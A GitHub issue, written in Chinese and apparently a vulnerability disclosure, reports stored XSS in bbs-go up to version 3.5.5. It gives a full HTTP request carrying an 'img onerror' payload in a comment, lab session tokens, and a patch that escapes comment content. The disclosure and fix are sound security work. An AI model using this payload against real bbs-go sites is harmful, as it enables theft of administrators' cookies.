We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
漏洞名称 bbs-go 存储式跨站脚本漏洞
受影响实体版本号 bbs-go <= 3.5.5
漏洞类型 存储式跨站脚本
危害等级 高危
漏洞简介 bbs-go是一个使用Go语言搭建的开源社区系统,采用前后端分离技术,Go语言提供api进行数据支撑,用户界面使用Nuxt.js进行渲染,后台界面基于element-ui。 bbs-go存在存储式跨站脚本漏洞,该漏洞源于程序未正确处理来自用户的输入。用户注册后在文章评论处可以注入恶意javascript脚本,管理员在管理端-内容管理-文章管理处点击查看评论时触发恶意脚本,导致泄露cookie等信息。 以下产品及版本受到影响:bbs-go <= 3.5.5 bbs-go的下载地址:https://github.com/mlogclub/bbs-go
漏洞验证 前置条件:用户注册登录 步骤:
完整请求报文: POST /api/comment/create HTTP/1.1 Host: 192.168.111.130:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0 Accept: application/json, text/plain, / Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Client: bbs-go-site X-User-Token: 1c1c47cb70f447589944117cb339518b Content-Type: application/x-www-form-urlencoded Content-Length: 100 Origin: http://192.168.111.130:3000 Connection: close Referer: http://192.168.111.130:3000/article/4 Cookie: Hm_lvt_79b8ff82974d0769ef5c629e4cd46629=1677550437; Hm_lpvt_79b8ff82974d0769ef5c629e4cd46629=1677639532; Admin-Token=57581e925fad47688596c13f8a48803d; userToken=1c1c47cb70f447589944117cb339518b
entityType=article&entityId=4&content=%3Cimg%20src%20onerror%3Dalert%28123%29%3E&imageList="eId= 7. 使用管理员账号admin/123456登录管理端,点击内容管理-文章管理,选择这篇文章,查看评论
触发XSS
修复建议 bbs-go\server\controllers\admin\comment_controller.go:71 改为builder.Put("content", html.EscapeString(comment.Content)) 对comment.Content进行html实体编码可临时解决该漏洞。
The text was updated successfully, but these errors were encountered:
在最新版本中是否可以复现此问题?
Sorry, something went wrong.
No branches or pull requests
漏洞名称
bbs-go 存储式跨站脚本漏洞
受影响实体版本号
bbs-go <= 3.5.5
漏洞类型
存储式跨站脚本
危害等级
高危
漏洞简介
bbs-go是一个使用Go语言搭建的开源社区系统,采用前后端分离技术,Go语言提供api进行数据支撑,用户界面使用Nuxt.js进行渲染,后台界面基于element-ui。
bbs-go存在存储式跨站脚本漏洞,该漏洞源于程序未正确处理来自用户的输入。用户注册后在文章评论处可以注入恶意javascript脚本,管理员在管理端-内容管理-文章管理处点击查看评论时触发恶意脚本,导致泄露cookie等信息。
以下产品及版本受到影响:bbs-go <= 3.5.5
bbs-go的下载地址:https://github.com/mlogclub/bbs-go
漏洞验证
前置条件:用户注册登录
步骤:
完整请求报文:
POST /api/comment/create HTTP/1.1
Host: 192.168.111.130:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Client: bbs-go-site
X-User-Token: 1c1c47cb70f447589944117cb339518b
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
Origin: http://192.168.111.130:3000
Connection: close
Referer: http://192.168.111.130:3000/article/4
Cookie: Hm_lvt_79b8ff82974d0769ef5c629e4cd46629=1677550437; Hm_lpvt_79b8ff82974d0769ef5c629e4cd46629=1677639532; Admin-Token=57581e925fad47688596c13f8a48803d; userToken=1c1c47cb70f447589944117cb339518b
entityType=article&entityId=4&content=%3Cimg%20src%20onerror%3Dalert%28123%29%3E&imageList="eId=
7. 使用管理员账号admin/123456登录管理端,点击内容管理-文章管理,选择这篇文章,查看评论
触发XSS
修复建议
bbs-go\server\controllers\admin\comment_controller.go:71
改为builder.Put("content", html.EscapeString(comment.Content))
对comment.Content进行html实体编码可临时解决该漏洞。
The text was updated successfully, but these errors were encountered: